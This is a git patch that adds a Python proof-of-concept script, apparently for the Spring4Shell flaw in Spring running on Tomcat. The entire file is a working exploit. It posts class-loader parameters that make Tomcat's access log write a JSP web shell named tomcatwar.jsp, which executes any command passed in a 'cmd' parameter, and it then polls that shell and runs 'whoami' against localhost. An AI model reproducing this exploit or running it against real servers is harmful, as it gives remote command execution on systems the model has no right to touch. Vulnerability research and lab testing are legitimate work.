From e40c9323022f420eb52c3a8222f6aadbac04707d Mon Sep 17 00:00:00 2001 From: Duarte Duarte Date: Tue, 18 Apr 2023 15:15:31 +0100 Subject: [PATCH] Add vulnerability PoC --- mega_poc.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 mega_poc.py diff --git a/mega_poc.py b/mega_poc.py new file mode 100644 index 0000000..159de6c --- /dev/null +++ b/mega_poc.py @@ -0,0 +1,46 @@ +import time + +import requests + +payload = { + "class.module.classLoader.resources.context.parent.pipeline.first.pattern": '%{c2}i { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i', + "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp", + "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT", + "class.module.classLoader.resources.context.parent.pipeline.first.prefix": "tomcatwar", + "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "", +} + +if __name__ == "__main__": + go = requests.post( + "http://localhost:8080/demo/index", + headers={"suffix": "%>//", "c2": "<%"}, + data=payload, + timeout=15, + allow_redirects=False, + verify=False, + ) + + print("deploy", go) + + for i in range(60): + shellgo = requests.get( + "http://localhost:8080/tomcatwar.jsp", + timeout=15, + allow_redirects=False, + verify=False, + ) + + print("webshell", shellgo) + if shellgo.status_code == 500: + print("webshell", "http://localhost:8080/tomcatwar.jsp?cmd=whoami") + print( + requests.get( + "http://localhost:8080/tomcatwar.jsp?cmd=whoami", + timeout=15, + allow_redirects=False, + verify=False, + ).text[:20] + ) + break + + time.sleep(1)